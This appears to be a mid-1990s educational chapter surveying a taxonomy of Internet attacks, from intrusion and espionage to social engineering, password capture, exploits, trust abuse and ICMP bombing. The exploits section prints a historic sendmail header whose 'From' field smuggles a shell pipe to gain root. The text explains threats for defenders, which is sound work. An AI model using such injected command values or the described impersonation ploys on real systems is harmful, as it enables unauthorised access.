|
|
[Chap95] identifies three generic risks when connecting a trusted network with one that cannot be trusted :-
In a presentation titled "A Taxonomy of Internet Attacks - What you can expect to see" [Ranu95c] Marcus Ranum described eight types of attack from the Internet :-
A discussion of the generic threats identified by Chapman and of the types of attack identified by Ranum is given below.
Intrusion occurs when an attacker gains access to the system and is able to use it and modify it in the same way as a legitimate user. In some cases rigorous password protection can protect against this type of attack, with accounts locking after three failed access attempts etc. However policies need to be geared against social engineering attacks as well, where an attacker uses ploys such as posing as a senior manager and demanding an immediate password change to allow very important and urgent work to continue. Some attacks in this category will exploit weaknesses in operating system security and will not require the attacker to knock at the door, the door opens itself for them.
Industrial espionage is on the rise, [NCSA96] reports that there are currently 122 countries actively engaged in industrial and economic espionage to the benefit of their respective states. A study in 1992 sponsored by the American Society for Industrial Security (ASIS) found that proprietary business information theft had increased 260 percent since 1985 [NIST95]. The data indicated 30 percent of the reported losses in 1991 and 1992 had foreign involvement. The study also found that 58 percent of thefts were perpetrated by current or former employees. The three most damaging types of stolen information were pricing information, manufacturing process information, and product development and specification information. Other types of information stolen included customer lists, basic research, sales data, personnel data, compensation data, cost data, proposals, and strategic plans [NIST95].
Most experts are pessimistic about the extent and the scale of the problem, for example the following extract is from a recent book by an acknowledged expert on Internet security [Chap95].
"….Espionage is much more difficult to detect than run-of-the-mill break-ins, however. Information theft need not leave any traces at all, and even intrusions are relatively rarely detected immediately. Somebody who breaks in, copies data, and leaves without disturbing anything is quite likely to get away with it at most sites.
In practical terms most organisations can't prevent spies from succeeding. The precautions that governments take to protect sensitive information on computers are complex, expensive and cumbersome; therefore are used on only the most critical resources. These precautions include electromagnetic shielding, careful access controls, and absolutely no connections to unsecured networks."
Traditional warfare may even be giving way to "Information Warfare". The implications that the failure of the communications infrastructure would have for technology dependent Western society have prompted both Britain and the USA to develop formal Information Warfare Policies. Information warfare represents a global challenge that faces all late-industrial and information age nation states. It also represents the cheapest way for less developed nation states and religious or political movements to anonymously and grievously attack major nations and industrial corporations [NCSA96]. During a World-wide Threat Assessment briefing to the US Senate Select Committee on Intelligence, John Deutch, Director of the US Central Intelligence Agency said :-
"While intelligence sources have only identified a handful of countries that have instituted formal information warfare programs, I am concerned that the threat to our information systems will grow in coming years as the enabling technologies to attack these systems proliferate and more countries and groups develop new strategies that incorporate such attacks."
A denial of service attack seeks to deny use of resources to legitimate users. This type of attack can be achieved in a multitude of ways, for example by corrupting routing tables etc. causing messages to be re-routed, by overloading resources with junk messages, by damaging stored data, by locking user accounts, and so on.
Example 1 - The attacker ICMP bombs router off the network.
Example 2 - The attacker floods network link with garbage packets.
Example 3 - The attacker floods mail hub with junk mail (or many users send many messages to one address.)(1)
There is little that a network administrator can do to prevent denial of service attacks as an attacker can always attack upstream of the point of connection to the Internet and disrupt service. This is one of the reasons that people are wary of using the Internet for mission critical or time critical connectivity.
Malicious Code
Malicious code can be thought of as an indirect denial of service attack. Most users are now familiar with the threat posed by viruses, worms, Trojan horses and genetic algorithms. However new forms of malicious code are appearing all the time. A new type of virus attacks documents rather than programs using the advanced features in desktop productivity tools such as word processors.
Currently the two high risk areas for infection with malicious code are when downloading files or in binary attachments to mail messages. However new technologies are being developed that extend World Wide Web viewers by downloading and executing software on the client rather than the server. Such programs are known as applets and greatly increase the risk of infection from malicious code.
Example 1 Inexperienced user is tricked into changing password
Example 2 Attacker masquerades as administrator and asks for password for some reason or gives user new password and tells them to change it.
The infamous computer criminal Kevin Mitnick, subject of the book "Cyberpunk" [Hafn91], used social engineering techniques extensively. He was, for example, able to obtain a Pacific Bell internal memorandum by posing as a Pacific Bell executive and asking the author's secretary to fax a copy to him. Mitnick had attacked the telephone company's computerised exchange and was able to divert the call to a friend's fax machine. The friend's fax machine had been reprogrammed to indicate the message had reached its correct destination. The details of the memo appeared on the front page of the New York Times shortly after in July 1988 in an article by John Markoff, the same journalist that would later that year break the story of Robert Tappan Morris and the Internet "Worm" Virus [Mark88] see also [Eich89].
Mitnick was also able to convince Neill Clift, a British computer researcher and VMS security expert that he was an employee of Digital Equipment Corporation. At Clift's request Mitnick supplied technical manuals that Clift believed could only have come from Digital and released detailed information about security weaknesses.
People generally like being helpful and co-operative and attackers exploit this ruthlessly. Social Engineering is very hard to protect against as it is essentially hitting a "soft" target and requires "soft" means of addressing it such as staff education, clear policies and mechanisms for reporting problems.
Any attack where the attacker captures valid user-id and password and reuses them to gain access to system.
Example 1 A user uses Telnet program to connect to system from remote site and an attacker with network sniffer such as tcpdump or nitsniff etc. captures the login session. The attacker is later able to login to system with captured user-id and password.
Example 2 The attacker writes a shell script to present a false login session to the user. The user enters his correct user-id and password which the script records before initiating a real login session to allow the user to login. The user thinks he has entered his password incorrectly and is none the wiser.
Impersonation attacks are primarily sniffer and spoofing attacks [Tard95], with attackers seeking to capture passwords. It is a mistake to dismiss attacks on passwords as being of little danger. The miscreant who attacked Eindhoven University of Technology in 1990 causing Wietse Venema to develop a tool called TCP-Wrappers used password guessing as his primary means of gaining accounts [Vene92]. This individual (Venema referred to him as "his pet") frequently deleted all files on target systems. Venema's "pet" has earned himself an interesting footnote in computer security history. He was known as "Berferd(2)" to Cheswick and Bellovin who described his activities in "An evening with Berferd" [Ches92] and in their book subtitled "Repelling the Wily Hacker" [Ches94]. As if this level of interest wasn't enough, Tsutomu Shimomura knew him as "Adrian" . Shimomura tracked him as he attacked and damaged computers all over the Internet and wrote about the experience in "Takedown" [Shim95]. Much of the early work on firewalls refers extensively to this one hacker, who escaped arrest or punishment as he conducted his attacks from Holland which had no laws to prevent him.(3) There are several excellent accounts of how system administrators have pursued hackers and of the tools they developed in doing so [Stoll89, Bell92, Bell94, Hafn91, Shim96].
These are attacks that seek to exploit a hole in a piece of software. Most of CERT's advisories fall into this category. For example the UNIX sendmail program runs with system privileges. Sending a message with the "To" and "From" fields completed as shown has given root access to the sender :-
To : mrinvisible@nonexistnat.com
From "| /bin/sed '1,//d' | sh"
Exploits succeed because badly written software is the norm, security is generally added as afterthought, too many programs run with excessive privilege violating the least privilege principle, and few programs use the operating systems underlying security features [Ranu96c].
Transitive trust attacks take advantage of the trust models used by remote services (such as the "r" commands discussed in chapter 2).
Example 1 Many networks use ".rhost" files so that users can log in from "trusted" hosts without giving a password. An attacker who gains access to a host and scans for exported file systems using a remote procedure call is able to build a trust model of the network. The attacker then compromises a user account on one of the remote computers to gain a foothold on an entirely new network. This is one of the attack strategies that the 1988 Internet "Worm" Virus used to propagate itself [Eich89].
Data driven attacks take the form of Viruses and Trojan Horses. For example an attacker can email the victim a postscript file with hidden file operations in it. If the victim displays the file on his workstation with a postscript interpreter (such as Ghostscript), the postscript interpreter will execute the file operations. These may perform actions such as adding the attacker's host name to the victim's ".rhosts" file allowing the attacker to gain access to the victim's computer.
The World Wide Web is currently particularly vulnerable to data driven attacks. The emergence of languages such as Java that will run code on the client computer present attackers with significant new potential for this type of attack.
A firewall can help to screen out some data driven attacks. Some firewalls vendors are incorporating anti-virus software into their products, and some are able to control executable files. However firewalls in general provide little protection from data driven attacks.
Infrastructure attacks include DNS Spoofing, ICMP Bombing and Source Routing.
Example 1 ICMP Bombing. ICMP (Internet Control Message Protocol) is used to re-route traffic on the fly and by routers to notify a host when a destination system or network is unreachable. An attacker can use widely available tools such as "icmpbomb" or "nuke" to send ICMP "host unreachable" packets to a target system effectively knocking the network off the Internet.
Most firewalls and routers can screen ICMP traffic. However ICMP is used for legitimate purposes such as Ping and screening ICMP messages in routers can cause network problems. Firewalls that are a single point of connectivity correctly interpret ICMP without letting it through.
Firewalls can block and log all source routed packets and tools like TCP wrappers can detect source routed packets and trigger alarms. Many routers can block source routed packets.
These are attacks that nobody has thought of yet. Such attacks if and when discovered will be full of surprises. An illustrative (and possible) example is Racing Authentication, where an attacker is able to sniff packets as a legitimate user logs in with SecurID or other similar authentication token. The attacker mirrors the user's keystrokes and takes a guess at last digit of SecurID code, thereby winning the "race" with the user to login. If the attack is successful (an average of 1 in 10 should be) then the attacker is granted access, and the user probably just thinks they have made a typing error.
Attackers are likely to use a combination of the above methods when seeking to gain unauthorised access or to deny service etc.
Exampe 1 The attacker tells a new user who is using IRC (Internet Relay Chat) to obtain a utility program that will help them to use system better. This phase of the attack can be categorised as Social Engineering. The user downloads the program and runs it causing all his messages to be deleted, and exposing the password file to the attacker. This phase of the attack can be categorised as Data-Driven.
There are several tools that will probe a computer to test for known vulnerabilities [Farm93, Farm94, Drew95, Tabi96]. Some of these tools are public domain, for example Farmer and Venema's SATAN tool. These tools can be used by system administrators to perform security audits, however they can also be used by attackers to probe for weaknesses.
(1)As happened to the law company that sent unsolicited mail advertising their services
(2) Berferd was the account name he captured at Bell Labs. The account name itself was based on an episode of the Dick Van Dyke show when Dick Van Dyke's brother called him "Berferd" - because he looked like a "Berferd".
(3) This changed in 1992. The first Dutch hackers to be arrested at the end of February 1992 were much less harmful though [Vene92]